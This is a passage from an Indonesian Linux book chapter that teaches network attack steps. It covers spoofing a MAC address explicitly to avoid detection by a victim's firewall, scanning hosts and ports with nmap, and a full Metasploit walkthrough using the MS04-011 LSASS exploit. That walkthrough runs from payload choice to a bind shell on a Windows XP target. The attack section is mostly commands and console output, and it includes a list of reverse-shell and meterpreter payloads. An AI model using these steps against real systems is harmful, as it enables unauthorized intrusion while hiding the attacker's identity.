10011010 : 11010000 Agar tiap ethernet memiliki alamat yang unik, maka tiap vendor perangkat Ethernet diberi alokasi prefix
156
Copyright © 2007 hhan.wordpress.com yang harus dituliskan mengawali tiap alamat Ethernet yang dibuatnya. Sebagai contoh prefix 8:0:2 merupakan alamat prefix yang dialokasikan untuk pabrikan AMD (Adavanced Micro Device). Kemudian untuk menjamin tiap Ethernet dari satu pabrikan memiliki MAC Address yang berbeda, maka pabrikan menambahkan nomor di belakang prefixnya, sehingga dengan demikian tiap Ethernet meiliki alamat yang unik. Lalu kenapa kita meski mengubah MAC Address kita?. Sebenarnya MAC Adress tidak bisa diubah alamatnya, yang kita bisa adalah membuat seolah-olah alamat tersebut berubah, hal ini kita perlukan untuk mengantisipasi agar MAC Address kita yang sebenarnya tidak terekam oleh firewall pada computer korban sehingga identitas kita tidak terdeteksi. Untuk mengubah Mac Address pada Ethernet kita, dapat menggunakan program macchanger yang ada pada linux auditor security. Ikuti langkah berikut untuk memulainya. Klik start menu Æ Utils Æ Change-Mac (MAC Address Changer)
157
Copyright © 2007 hhan.wordpress.com
Gambar 8.28 Memulai macchanger. kemudian akan muncul sebuah tampilan seperti berikut.
Gambar 8.29 Tampilan awal macchanger. Terdapat empat pilihan yang dapat kita lakukan untuk mengubah MAC Address, yaitu: 1. Set a macaddress with identical mediatype.
158
Copyright © 2007 hhan.wordpress.com
Gambar 8.30 Set a macaddress with identical mediatype. Option diatas akan menggenerate mac address secara otomatis, mac address yang baru (fake mac address/mac address hasil generate) merupakan mac adreess yang telah terdaftaar prefixnya. 2. Set a macaddress of any valid mediatype.
Gambar 8.31 Set a macaddress of any valid mediatype. 3. Set a complete random macaddress.
159
Copyright © 2007 hhan.wordpress.com
Gambar 8.32 Set a complete random macaddress. Jika menggunkan option ini maka mac address akan di set secara random, jadi belum tentu alamat prefix dari mac tersebut merupakan alamat prefix yang telah terdaftar.
4. set your desired macaddress manually.
Gambar 8.33 set your desired macaddress manually. Tulis MAC Address yang anda kehendaki dan klik ok, kemudian akan muncul seperti berikut.
160
Copyright © 2007 hhan.wordpress.com
Gambar 8.34 Info MAC Address yang baru. Selain dengan cara diatas Macchanger bisa juga dijalankan melalui console dengan perintah sebagai berikut : root@hhan:~ # macchanger [options] device
options yang macchanger :
dapat
diisikan
pada
perintah
-h, --help
Show summary of options.
-V, --version
Show version of program.
-e, --endding bytes.
Don't change the vendor
-a, --another same kind.
Set random vendor MAC of the
-A kind.
Set random vendor MAC of any
-r, --random
Set fully random MAC.
161
Copyright © 2007 hhan.wordpress.com
-l, --list[=keyword] Print known vendors (with keyword in the vendor's description string) -m, --mac XX:XX:XX:XX:XX:XX Set the MAC XX:XX:XX:XX:XX:XX
Device dapat anda isi dengan alamat dari Ethernet anda, misalnya eth0. Contoh penggunakan perintah diatas : root@hhan:~ # macchanger -A eth0
8.2.4 Scanning Menggunakan NMAP NMAP atau Network Mapper merupakan salah satu tool hacker yang diperlihatkan pada adegan film “The Matrix”. NMAP merupakan sebuah tool yang digunakan untuk scanning, scanning disini maksudnya adalah mencari informasi dari system target tentang port-port yang terbuka, system operasi yang digunakan, dsb. Dengan melakukan proses scanning kita dapat melihat service-service yang dijlalankan pada host target dengan melihat port-port yang terbuka, sehingga kita dapat menentukan perlengakapan apa saja yang kita perlukan untuk memasuki system target.
162
Copyright © 2007 hhan.wordpress.com
Gambar 8.35 Salah satu cuplikan adegan pada film “The Matrix” yang memperlihatkan NMAP. Untuk memulai menggunakan perintah berikut ini :
NMAP
ketikan
hhan@hhan:~# nmap -h
Perintah diatas akan menjalankan NMAP dan memperilhatkan option-option yang dimiliki. Berikut ini option-option yang dapat digunkan pada saat menjalankan NMAP. root@hhan:~# nmap -h Nmap 3.75 Usage: nmap [Scan Type(s)] [Options] Some Common Scan Types ('*' options require root privileges) * -sS TCP SYN stealth port scan (default if privileged (root)) -sT TCP connect() port scan (default for unprivileged users) * -sU UDP port scan
163
Copyright © 2007 hhan.wordpress.com -sP ping scan (Find any reachable machines) * -sF,-sX,-sN Stealth FIN, Xmas, or Null scan (experts only) -sV Version scan probes open ports determining service & app names/versions -sR RPC scan (use with other scan types) Some Common Options (none are required, most can be combined): * -O Use TCP/IP fingerprinting to guess remote operating system -p ports to scan. Example range: 11024,1080,6666,31337 -F Only scans ports listed in nmap-services -v Verbose. Its use is recommended. Use twice for greater effect. -P0 Don't ping hosts (needed to scan www.microsoft.com and others) * -Ddecoy_host1,decoy2[,...] Hide scan using many decoys -6 scans via IPv6 rather than IPv4 -T <Paranoid|Sneaky|Polite|Normal|Aggressive|Insan e> General timing policy -n/-R Never do DNS resolution/Always resolve [default: sometimes resolve] -oN/-oX/-oG Output normal/XML/grepable scan logs to -iL Get targets from file; Use '' for stdin * -S /-e <devicename> Specify source address or network interface --interactive Go into interactive mode (then press h for help) Example: nmap -v -sS -O www.my.com 192.168.0.0/16 '192.88-90.*.*'
164
Copyright © 2007 hhan.wordpress.com 8.2.4.1
Mengetahui Host Yang Aktif
Untuk mendapatkan informasi host mana saja yang saat itu sedang aktif anda dapat menggunkan perintah ping seperti berikut : Perintah ping yang memperlihatkan bahwa host target sedang aktif : root@hhan:~# ping -c 5 192.168.0.4 PING 192.168.0.4 (192.168.0.4) 56(84) data. 64 bytes from 192.168.0.4: icmp_seq=1 time=0.259 ms 64 bytes from 192.168.0.4: icmp_seq=2 time=0.277 ms 64 bytes from 192.168.0.4: icmp_seq=3 time=0.264 ms 64 bytes from 192.168.0.4: icmp_seq=4 time=0.253 ms 64 bytes from 192.168.0.4: icmp_seq=5 time=0.283 ms
bytes of ttl=128 ttl=128 ttl=128 ttl=128 ttl=128
--- 192.168.0.4 ping statistics --5 packets transmitted, 5 received, 0% packet loss, time 3999ms rtt min/avg/max/mdev = 0.253/0.267/0.283/0.015 ms
Perintah ping yang memperlihatkan bahwa host target tidak aktif : root@box:~# ping -c 5 192.168.0.2 PING 192.168.0.2 (192.168.0.2) 56(84) bytes of data. From 192.168.0.1 icmp_seq=2 Destination Host Unreachable
165
Copyright © 2007 hhan.wordpress.com From 192.168.0.1 icmp_seq=3 Destination Host Unreachable From 192.168.0.1 icmp_seq=4 Destination Host Unreachable From 192.168.0.1 icmp_seq=5 Destination Host Unreachable --- 192.168.0.2 ping statistics --5 packets transmitted, 0 received, +4 errors, 100% packet loss, time 3999ms, pipe 3
Dengan perintah ping tersebut kita akan mengetahui apakah suatu host tersebut sedang aktif atau tidak. Option –c pada perintah ping digunakan untuk menentukan jumlah paket yang dikirimkan. Keterbatasan pada perintah ping adalah kita harus mengecek satu persatu tiap host pada jaringan untuk mengetahui host mana saja yang sedang aktif pada saat itu, hal tersebut tentu saja membuat pekerjaan kita menjadi lama. Untuk mengecek secara cepat host mana saja yang aktif pada saat itu dalam sebuah network kita dapat menggunakan NMAP sebagai solusinya. Ketikan perintah berikut : root@2[knoppix]# nmap -sP 192.168.0.1-255 Starting nmap 3.75 ( http://www.insecure.org/nmap/ ) at 2006-07-28 00:23 EDT Host 192.168.0.1 appears to be up. Host 192.168.0.2 appears to be up. MAC Address: 00:0B:2B:0E:F4:D4 (Hostnet) Host 192.168.0.7 appears to be up. MAC Address: 00:13:D4:3D:E0:F2 (Unknown) Host 192.168.0.9 appears to be up. MAC Address: 00:15:F2:53:1B:8B (Unknown) Host 192.168.0.15 appears to be up.
166
Copyright © 2007 hhan.wordpress.com MAC Address: 00:08:A1:68:FF:41 (CNet Technology) Host 192.168.0.19 appears to be up. MAC Address: 00:16:EC:02:70:92 (Unknown) Host 192.168.0.21 appears to be up. MAC Address: 00:0F:EA:2A:84:04 (Giga-Byte Technology Co.) Host 192.168.0.33 appears to be up. MAC Address: 02:0C:6E:64:09:A2 (Unknown) Host 192.168.0.56 appears to be up. MAC Address: 00:13:D4:3D:C0:7D (Unknown) Host 192.168.0.63 appears to be up. MAC Address: 00:13:46:3C:06:2D (Unknown) Host 192.168.0.64 appears to be up. MAC Address: 00:00:21:FF:90:4E (Sureman COMP. & Commun.) Host 192.168.0.67 appears to be up. MAC Address: 00:E0:18:B3:D2:66 (Asustek Computer) Host 192.168.0.76 appears to be up. MAC Address: 00:0D:88:CC:76:DA (D-Link) Host 192.168.0.78 appears to be up. MAC Address: 00:69:00:12:20:7C (Unknown) Host 192.168.0.84 appears to be up. MAC Address: 00:16:EC:2C:C7:15 (Unknown) Host 192.168.0.85 appears to be up. MAC Address: 00:0E:A6:65:05:75 (Asustek Computer) Host 192.168.0.97 appears to be up. MAC Address: 00:14:85:ED:23:1A (Unknown) Host 192.168.0.98 appears to be up. MAC Address: 00:0D:61:95:23:A3 (Giga-Byte Technology Co.) Host 192.168.0.108 appears to be up. MAC Address: 00:01:29:D5:22:0E (DFI) Host 192.168.0.121 appears to be up. MAC Address: 00:14:2A:78:04:6E (Unknown) Host 192.168.0.126 appears to be up. MAC Address: 00:11:09:FB:DF:A5 (Micro-Star International) Host 192.168.0.145 appears to be up.
167
Copyright © 2007 hhan.wordpress.com MAC Address: 00:E0:18:BB:60:35 (Asustek Computer) Host 192.168.0.220 appears to be up. MAC Address: 00:00:60:00:41:40 (Kontron Elektronik Gmbh) Host 192.168.0.229 appears to be up. MAC Address: 00:0D:87:AB:F6:DE (Elitegroup Computer System Co. (ECS)) Host 192.168.0.244 appears to be up. MAC Address: 00:50:8D:DB:62:AF (Abit Computer) Host 192.168.0.245 appears to be up. MAC Address: 00:50:8D:DB:2D:A3 (Abit Computer) Host 192.168.0.246 appears to be up. MAC Address: 00:10:4B:98:55:09 (3com) Host 192.168.0.254 appears to be up. MAC Address: 00:11:D8:F9:8B:B7 (Asustek Computer) Host 192.168.0.255 seems to be a subnet broadcast address (returned 1 extra pings). Nmap run completed -- 255 IP addresses (28 hosts up) scanned in 6.164 seconds
Perintah di atas akan mendeteksi host mana saja yang aktif dari range IP 192.168.0.1 sampai dengan 192.168.0.255 serta mendeteksi mac address dan pabrikan Ethernet dari tiap host.
8.2.4.2
Melakukan Scanning Port
Scanning port adalah aktivitas yang dilakukan untuk mengetahui port-port mana saja dari host target yang aktif dengan jalan melakukan proses koneksi ke port-port TCP atau UDP pada host target. Untuk melakukan scanning port dapat kita lakukan memakai NMAP dengan disertai option –sS seperti berikut ini.
168
Copyright © 2007 hhan.wordpress.com
root@3[knoppix]# nmap -sS 192.168.0.9 Starting nmap 3.75 ( http://www.insecure.org/nmap/ ) at 2006-07-28 00:27 EDT Interesting ports on 192.168.0.9: (The 1658 ports scanned but not shown below are in state: closed) PORT STATE SERVICE 135/tcp open msrpc 139/tcp open netbios-ssn 445/tcp open microsoft-ds 4444/tcp open krb524 6112/tcp open dtspc MAC Address: 00:15:F2:53:1B:8B (Unknown) Nmap run completed -- 1 IP address (1 host up) scanned in 1.740 seconds
Dari perintah diatas dapat kita lihat bahwa host dengan IP 192.168.0.9 dengan Mac Address 00:15:F2:53:1B:8B membuka lima buah port. Perintah diatas hanya akan melakukan scanning pada satu host saja, untuk melakukan scanning port pada beberapa host sekaligus misalnya dari host dengan IP 192.168.0.9 sampai 192.168.0.22, lakukan modifikasi pada perintah diatas menjadi seperti berikut. root@3[knoppix]# nmap -sS 192.168.0.9-22 Starting nmap 3.75 ( http://www.insecure.org/nmap/ ) at 2006-07-28 00:28 EDT Interesting ports on 192.168.0.9: (The 1658 ports scanned but not shown below are in state: closed)
169
Copyright © 2007 hhan.wordpress.com PORT STATE SERVICE 135/tcp open msrpc 139/tcp open netbios-ssn 445/tcp open microsoft-ds 4444/tcp open krb524 6112/tcp open dtspc MAC Address: 00:15:F2:53:1B:8B (Unknown) Interesting ports on 192.168.0.19: (The 1658 ports scanned but not shown below are in state: filtered) PORT STATE SERVICE 135/tcp open msrpc 139/tcp open netbios-ssn 445/tcp open microsoft-ds 1025/tcp open NFS-or-IIS 5000/tcp open UPnP MAC Address: 00:16:EC:02:70:92 (Unknown) Interesting ports on 192.168.0.21: (The 1659 ports scanned but not shown below are in state: closed) PORT STATE SERVICE 135/tcp open msrpc 139/tcp open netbios-ssn 445/tcp open microsoft-ds 6112/tcp open dtspc MAC Address: 00:0F:EA:2A:84:04 (Giga-Byte Technology Co.) Nmap run completed -- 14 IP addresses (3 hosts up) scanned in 20.560 seconds
-sS atau stealth scan merupakan teknik scanning TCP SYN yang sering juga disebut half open scan karena option ini tidak melakukan koneksi TCP/IP secara penuh dalam melakukan evaluasi port-port pada host target. Dengan menggunakan option ini
170
Copyright © 2007 hhan.wordpress.com kita akan mengirimakan paket SYN ke host target. Jika host target mengirim balik paket SYN_ACK berarti port tersebut tertutup. Setelah memperoleh paket balasan, computer kita akan mengirim paket RST untuk melakukan reset hubungan yang hamper terjadi, sehingga teknik ini disebut half open. 8.2.4.3
Scanning Pada Port Tertentu
NMAP menyertakan juga option yang digunakan untuk mendeteksi port-port tertentu saja. Dengan option ini kita dapat menentukan port-port berapa saja yang ingin kita evaluasi. Untuk lebih jelasnya ketikan perintah berikut. root@3[knoppix]# nmap -sS -p 22,80,135,139 192.168.0.229 Starting nmap 3.75 ( http://www.insecure.org/nmap/ ) at 2006-07-28 00:43 EDT Interesting ports on 192.168.0.229: PORT STATE SERVICE 22/tcp closed ssh 80/tcp open http 135/tcp open msrpc 139/tcp open netbios-ssn MAC Address: 00:0D:87:AB:F6:DE (Elitegroup Computer System Co. (ECS)) Nmap run completed -- 1 IP address (1 host up) scanned in 0.364 seconds
Dapat kita lihat dengan menyertakan option -p 22,80,135,139 nmap hanya akan melakukan evaluasi pada port 22, 80, 135 dan 139. Bedakan option –p diatas dengan option –pT dibawah ini.
171
Copyright © 2007 hhan.wordpress.com
root@3[knoppix]# nmap -sS -PT80 192.168.0.229 Starting nmap 3.75 ( http://www.insecure.org/nmap/ ) at 2006-07-28 00:41 EDT Interesting ports on 192.168.0.229: (The 1655 ports scanned but not shown below are in state: closed) PORT STATE SERVICE 80/tcp open http 135/tcp open msrpc 139/tcp open netbios-ssn 445/tcp open microsoft-ds 1025/tcp open NFS-or-IIS 3306/tcp open mysql 5000/tcp open UPnP 8009/tcp open ajp13 MAC Address: 00:0D:87:AB:F6:DE (Elitegroup Computer System Co. (ECS)) Nmap run completed -- 1 IP address (1 host up) scanned in 0.545 seconds
Dengan menggunakan option –PT80 hasil yang diperoleh adalah sama dengan menggunakan option –sS. Option ini akan melakukan scanning melalui port 80 pada host target, angka 80 dapat anda ganti dengan nomor port lainya, jika tanpa menyertakan angka dibelakang option –PT maka secara default NMAP akan melakukan scanning melalui port 80. Option ini biasanya digunakan untuk melakukan scanning pada web server, yang dapat dipastikan akan membuka port 80 untuk melayani servicenya. 8.2.4.4 Mengetahui Host Target
Sistem
Operasi
dari
172
Copyright © 2007 hhan.wordpress.com Secara sederhana sebenarnya kita dapat memperkirakan system operasi dari host target dengan melihat port-port yang terbuka. Misalnya windows NT yang listen/membuka port 135 dan 139, windows 95/98 yang listen pada port 139. Informasi yang didapat dengan cara seperti diatas tidaklah seakurat/sevalid jika kita menggunakan NMAP. NMAP menyertakan option yang dipakai untuk mendeteksi system operasi dari host target, yaitu dengan menggunakan option –O. untuk lebih jelasnya cobalah perintah berikut ini. root@3[knoppix]# nmap -sS -O 192.168.0.84-97 Starting nmap 3.75 ( http://www.insecure.org/nmap/ ) at 2006-07-28 00:35 EDT Warning: OS detection will be MUCH less reliable because we did not find at least 1 open and 1 closed TCP port Interesting ports on 192.168.0.84: (The 1661 ports scanned but not shown below are in state: filtered) PORT STATE SERVICE 139/tcp open netbios-ssn 445/tcp open microsoft-ds MAC Address: 00:16:EC:2C:C7:15 (Unknown) Device type: general purpose Running: IBM AIX 4.X, Microsoft Windows 2003/.NET OS details: IBM AIX 4.3.2.0-4.3.3.0 on an IBM RS/*, Microsoft Windows Server 2003 Interesting ports on 192.168.0.85: (The 1658 ports scanned but not shown below are in state: closed) PORT STATE SERVICE 135/tcp open msrpc
173
Copyright © 2007 hhan.wordpress.com 139/tcp open netbios-ssn 445/tcp open microsoft-ds 1025/tcp open NFS-or-IIS 5000/tcp open UPnP MAC Address: 00:0E:A6:65:05:75 (Asustek Computer) Device type: general purpose Running: Microsoft Windows 95/98/ME|NT/2K/XP OS details: Microsoft Windows Millennium Edition (Me), Windows 2000 Pro or Advanced Server, or Windows XP Interesting ports on 192.168.0.97: (The 1659 ports scanned but not shown below are in state: closed) PORT STATE SERVICE 135/tcp open msrpc 139/tcp open netbios-ssn 445/tcp open microsoft-ds 6112/tcp open dtspc MAC Address: 00:14:85:ED:23:1A (Unknown) Device type: general purpose Running: Microsoft Windows 2003/.NET|NT/2K/XP OS details: Microsoft Windows Server 2003 or XP SP2 Nmap run completed -- 14 IP addresses (3 hosts up) scanned in 19.712 seconds
Dari perintah diatas dapat kita lihat adanya informasi tambahan berupa detail system operasi tiap-tiap host. Seperti misalnya pada host dengan IP 192.168.0.97 terdapat informasi tentang system operasi yang digunakan seperti berikut. Running: Microsoft Windows 2003/.NET|NT/2K/XP OS details: Microsoft Windows Server 2003 or XP SP2
174
Copyright © 2007 hhan.wordpress.com 8.2.5 Remote Exploit Remote exploit adalah suatu program yang dijalankan pada computer attacker, digunakan untuk menginjeksi komputer target sehingga attacker memperoleh hak akses lebih dari yang diijinkan tanpa ataupun sepengetahuan dari korban. Linux Auditor Security menyediakan tool tersebut dengan nama Metasploit. Metasploit Sebelum memulainya tentu saja komputer attaccker harus di set IP-nya sesuai dengan IP dari jaringan lokal. berikut ini konfigurasi IP dari komputer attacker yang telah disesuaikan dengan konfigurasi IP pada jaringan local dimana attacker berada. hhan@hhan:~# ifconfig –eth0 192.168.0.10 netmask 255.255.255.0 hhan@hhan:~# ifconfig eth0 Link encap:Ethernet HWaddr 00:E0:18:F3:9A:D0 inet addr:192.168.0.10 Bcast:192.168.0.255 Mask:255.255.255.0 UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:712 errors:0 dropped:0 overruns:0 frame:0 TX packets:10 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:69398 (67.7 KiB) TX bytes:595 (595.0 b) Interrupt:5 Base address:0x9800
175
Copyright © 2007 hhan.wordpress.com lo
Link encap:Local Loopback inet addr:127.0.0.1 Mask:255.0.0.0 UP LOOPBACK RUNNING MTU:16436
Metric:1 RX packets:10 errors:0 dropped:0 overruns:0 frame:0 TX packets:10 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 RX bytes:500 (500.0 b) TX bytes:500 (500.0
Sesuaikan konfigurasi IP address dengan jaringan local tempat anda berada. Setelah konfigurasi IP address berhasil maka langkah selanjutnya ketikan perintah dibawah ini untuk memanggil console metasploit : hhan@hhan:~# cd /opt/auditor/metasploit hhan@hhan:~# ./msfconsole
atau klik: Auditor Æ Scanning Æ Security scanner Æ Metasploit
Gambar 8.36 Memulai Metasploit.
176
Copyright © 2007 hhan.wordpress.com Jika berhasil maka akan muncul sebuah tampilan seperti dibawah ini :
Gambar 8.37 Tampilan awal metsploit. Untuk memulai penggunakanya ketikan perintahperintah dibawah ini secara berurutan: msf > show exploits
Perintah tersebut akan memperlihatkan exploitexploit yang ada pada Metasploit. Berikut hasil dari perintah tersebut jika dijalankan: Metasploit Framework Loaded Exploits ==================================== 3com_3cdaemon_ftp_overflow 3Com 3CDaemon FTP Server Overflow Credits Metasploit Framework Credits afp_loginext AppleFileServer LoginExt PathName Overflow
177
Copyright © 2007 hhan.wordpress.com aim_goaway AOL Instant Messenger goaway Overflow apache_chunked_win32 Apache Win32 Chunked Encoding arkeia_agent_access Arkeia Backup Client Remote Access arkeia_type77_macos Arkeia Backup Client Type 77 Overflow (Mac OS X) arkeia_type77_win32 Arkeia Backup Client Type 77 Overflow (Win32) backupexec_ns Veritas Backup Exec Name Service Overflow bakbone_netvault_heap BakBone NetVault Remote Heap Overflow blackice_pam_icq ISS PAM.dll ICQ Parser Buffer Overflow cabrightstor_disco CA BrightStor Discovery Service Overflow cabrightstor_disco_servicepc CA BrightStor Discovery Service SERVICEPC Overflo cabrightstor_uniagent CA BrightStor Universal Agent Overflow calicclnt_getconfig CA License Client GETCONFIG Overflow calicserv_getconfig CA License Server GETCONFIG Overflow distcc_exec DistCC Daemon Command Execution exchange2000_xexch50 Exchange 2000 MS03-46 Heap Overflow globalscapeftp_user_input GlobalSCAPE Secure FTP Server user input overflow ia_webmail IA WebMail 3.x Buffer Overflow icecast_header Icecast (<= 2.0.1) Header Overwrite (win32) iis40_htr IIS 4.0 .HTR Buffer Overflow iis50_printer_overflow IIS 5.0 Printer Buffer Overflow
178
Copyright © 2007 hhan.wordpress.com iis50_webdav_ntdll IIS 5.0 WebDAV ntdll.dll Overflow iis_fp30reg_chunked IIS FrontPage fp30reg.dll Chunked Overflow iis_nsiislog_post IIS nsiislog.dll ISAPI POST Overflow iis_source_dumper IIS Web Application Source Code Disclosure iis_w3who_overflow IIS w3who.dll ISAPI Overflow imail_imap_delete IMail IMAP4D Delete Overflow imail_ldap IMail LDAP Service Buffer Overflow irix_lpsched_exec Irix lpsched Command Execution lsass_ms04_011 Microsoft LSASS MSO4-011 Overflow maxdb_webdbm_get_overflow MaxDB WebDBM GET Buffer Overflow mercantec_softcart Mercantec SoftCart CGI Overflow minishare_get_overflow Minishare 1.41 Buffer Overflow msasn1_ms04_007_killbill Microsoft ASN.1 Library Bitstring Heap Overflow msmq_deleteobject_ms05_017 Microsoft Message Queueing Service MSO5-017 msrpc_dcom_ms03_026 Microsoft RPC DCOM MSO3-026 mssql2000_preauthentication MSSQL 2000/MSDE Hello Buffer Overflow mssql2000_resolution MSSQL 2000/MSDE Resolution Overflow netterm_netftpd_user_overflow NetTerm NetFTPD USER Buffer Overflow openview_omniback HP OpenView Omniback II Command Execution oracle9i_xdb_ftp Oracle 9i XDB FTP UNLOCK Overflow (win32)
179
Copyright © 2007 hhan.wordpress.com oracle9i_xdb_ftp_pass Oracle 9i XDB FTP PASS Overflow (win32) payload_handler Metasploit Framework Payload Handler poptop_negative_read Poptop Negative Read Overflow realserver_describe_linux RealServer Describe Buffer Overflow samba_nttrans Samba Fragment Reassembly Overflow samba_trans2open Samba trans2open Overflow samba_trans2open_osx Samba trans2open Overflow (Mac OS X) samba_trans2open_solsparc Samba trans2open Overflow (Solaris SPARC) sambar6_search_results Sambar 6 Search Results Buffer Overflow seattlelab_mail_55 Seattle Lab Mail 5.5 POP3 Buffer Overflow sentinel_lm7_overflow SentinelLM UDP Buffer Overflow servu_mdtm_overflow Serv-U FTPD MDTM Overflow smb_sniffer SMB Password Capture Service solaris_dtspcd_noir Solaris dtspcd Heap Overflow solaris_kcms_readfile Solaris KCMS Arbitary File Read solaris_lpd_exec Solaris LPD Command Execution solaris_sadmind_exec Solaris sadmind Command Execution solaris_snmpxdmid Solaris snmpXdmid AddComponent Overflow solaris_ttyprompt Solaris in.telnetd TTYPROMPT Buffer Overflow squid_ntlm_authenticate Squid NTLM Authenticate Overflow
180
Copyright © 2007 hhan.wordpress.com svnserve_date Subversion Date Svnserve trackercam_phparg_overflow TrackerCam PHP Argument Buffer Overflow uow_imap4_copy University of Washington IMAP4 COPY Overflow uow_imap4_lsub University of Washington IMAP4 LSUB Overflow ut2004_secure_linux Unreal Tournament 2004 "secure" Overflow (Linux) ut2004_secure_win32 Unreal Tournament 2004 "secure" Overflow (Win32) warftpd_165_pass War-FTPD 1.65 PASS Overflow warftpd_165_user War-FTPD 1.65 USER Overflow webstar_ftp_user WebSTAR FTP Server USER Overflow windows_ssl_pct Microsoft SSL PCT MS04-011 Overflow wins_ms04_045 Microsoft WINS MS04-045 Code Execution wsftp_server_503_mkd WS-FTP Server 5.03 MKD Overflow
Masing-masing exploit tersebut memiliki fungsi dan karakteristik yang berbeda-beda antara satu dengan yang lainya. Dalam buku ini kita akan mencoba menggunakan exploit lsass_ms04_011 untuk mendapatkan akses ke system operasi Windows XP SP1. ketikan perintah berikut untuk menggunakan exploit tersebut: msf > use lsass_ms04_011 msf lsass_ms04_011 > show payloads
Perintah show payloads digunakan untk melihat payload yang dimiliki oleh exploit yang
181
Copyright © 2007 hhan.wordpress.com bersangkutan. Berikut ini adalah payload-payload yang dimiliki oleh exploit lsass_ms04_011. Metasploit Framework Usable Payloads ==================================== win32_adduser Windows Execute net user /ADD win32_bind Windows Bind Shell win32_bind_dllinject Windows Bind DLL Inject win32_bind_meterpreter Windows Bind Meterpreter DLL Inject win32_bind_stg Windows Staged Bind Shell win32_bind_stg_upexec Windows Staged Bind Upload/Execute win32_bind_vncinject Windows Bind VNC Server DLL Inject win32_exec Windows Execute Command win32_passivex Windows PassiveX ActiveX Injection Payload win32_passivex_meterpreter Windows PassiveX ActiveX Inject Meterpreter Payload win32_passivex_stg Windows Staged PassiveX Shell win32_passivex_vncinject Windows PassiveX ActiveX Inject VNC Server Payload win32_reverse Windows Reverse Shell win32_reverse_dllinject Windows Reverse DLL Inject win32_reverse_meterpreter Windows Reverse Meterpreter DLL Inject win32_reverse_ord Windows Staged Reverse Ordinal Shell win32_reverse_ord_vncinject Windows Reverse Ordinal VNC Server Inject
182
Copyright © 2007 hhan.wordpress.com win32_reverse_stg Reverse Shell win32_reverse_stg_upexec Reverse Upload/Execute win32_reverse_vncinject Reverse VNC Server Inject
Windows Staged Windows Staged Windows
Ketikan perintah berikut untuk menentukan payload yang digunakan, dalam hal ini kita akan menggunakan win32_bind sebagai payload-nya. msf lsass_ms04_011 > set PAYLOAD win32_bind PAYLOAD -> win32_bind
Setelah kita tentukan payload-nya langkah selanjutnya adalah menentukan alamat/IP address dari target. Ketikan perintah berikut ini untuk menentukan IP address dari target.
msf lsass_ms04_011(win32_bind) > set RHOST 192.168.0.123 RHOST -> 192.168.0.123
Langkah berikutnya setelah menentukan IP address dari target adalah melihat apakah semua option yang diperlukan telah diisi. Ketikan perintah berikut untuk melihat option-option yang diperlukan. msf lsass_ms04_011(win32_bind) > show options Exploit and Payload Options ===========================
183
Copyright © 2007 hhan.wordpress.com Exploit: Name Default Description --------------------------------------------------------required RHOST 192.168.0.123 target address optional SMBDOM domain for specified SMB username required RPORT 139 target port optional SMBUSER SMB username to connect with optional SMBPASS password for specified SMB username
-----The The The The The
Payload: Name Default Description ------------------------------------------------------------required EXITFUNC thread Exit technique: "process", "thread", "seh" required LPORT 4444 Listening port for bind shell Target: Automatic
Dari hasil diatas dapat kita lihat bahwa option required exploit telah kita isi semua, maka langkah selanjutnya adalah mengeksekusi exploit tersebut. Ketikan perintah berikut untuk melakukanya. msf lsass_ms04_011(win32_bind) > exploit RHOST -> 192.168.0.123 msf lsass_ms04_011(win32_bind) > exploit [*] Starting Bind Handler. [*] Detected a Windows XP target (orochimaru) [*] Windows XP may require two attempts [*] Sending 8 DCE request fragments... [*] Sending the final DCE fragment
184
Copyright © 2007 hhan.wordpress.com [*] Got connection from 192.168.0.10:1382 <-> 192.168.0.123:4444 Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:\WINDOWS\system32>
Jika diperoleh hasil seperti diatas maka dapat dikatakan bahwa anda telah berhasil mendapatkan akses secara penuh dari computer target. Ketikan perintah berikut untuk melihat cara kerja dari exploit tersebut. C:\WINDOWS\system32> netstat -a netstat -a Active Connections Proto Local Address Foreign Address State TCP orochimaru:epmap 0.0.0.0:0 LISTENING TCP orochimaru:microsoft-ds 0.0.0.0:0 LISTENING TCP orochimaru:1025 0.0.0.0:0 LISTENING TCP orochimaru:1056 0.0.0.0:0 LISTENING TCP orochimaru:1090 0.0.0.0:0 LISTENING TCP orochimaru:1095 0.0.0.0:0 LISTENING TCP orochimaru:1098 0.0.0.0:0 LISTENING TCP orochimaru:1130 0.0.0.0:0 LISTENING TCP orochimaru:4444 0.0.0.0:0 LISTENING
185
Copyright © 2007 hhan.wordpress.com TCP orochimaru:5000 0.0.0.0:0 LISTENING TCP orochimaru:netbios-ssn 0.0.0.0:0 LISTENING TCP orochimaru:1162 0.0.0.0:0 LISTENING TCP orochimaru:1169 0.0.0.0:0 LISTENING TCP orochimaru:4444 192.168.0.10:1382 ESTABLISHED UDP orochimaru:microsoft-ds *:* UDP orochimaru:isakmp *:* UDP orochimaru:ntp *:* UDP orochimaru:1900 *:* UDP orochimaru:ntp *:* UDP orochimaru:netbios-ns *:* UDP orochimaru:netbios-dgm *:* UDP orochimaru:1900 *:* ^c Caught interrupt, exit connection? [y/n]y msf lsass_ms04_011(win32_bind) >
Analisa dari hasil aktivitas diatas adalah sebagai berikut : Metasploit meng-attack korban melalui port 139 kemudian memasukan sebuah payload yang akan membangun hubungan antara korban dengan attacker dengan menggunakan mode koneksi TCP, dimana hubungan dilakukan melalui port 4444 pada sisi korban dan port 1382 pada sisi attacker. Setelah bind port antara attacker dengan korban terbentuk maka attacker akan mendapatkan hak akses dari komputer korban. Untuk keluar computer korban tekan tombol “Ctrl+c” kemudian ketikan “y” dan tekan “enter”. ^c Caught interrupt, exit connection? [y/n]y
186
Copyright © 2007 hhan.wordpress.com msf lsass_ms04_011(win32_bind)
DAFTAR PUSTAKA Hussain, K., Parker, T., et al. Red Hat Linux Unleashed. Wirzenius, L., Oja, J. 1998. The Linux System Administrators’ Guide Version 0.6.2. Computer & Communication Laboratory Jurusan Teknik Elektro Sekolah Tinggi Teknologi Telkom. 2001. Advanced Networking on Linux. Sekolah Tinggi Teknologi Telkom.Bandung. Yulianto, F. A. 2003. Diktat Kuliah Jaringan Komputer Versi 2.0. Jurusan Teknik Informatika Sekolah Tinggi Teknologi Telkom. Bandung. Raharja, R. A., Yunianto, A., Widyantoro, W., Wiryana, I.M. 2001. Open Source Campus Agreement Modul Pelatihan PENGENALAN LINUX. Open Source Campus Agreement. Azikin, A., Adi, A.S, Ady, G. 2004. GNU/Linux. Andi. Yogyakarta.
Debian
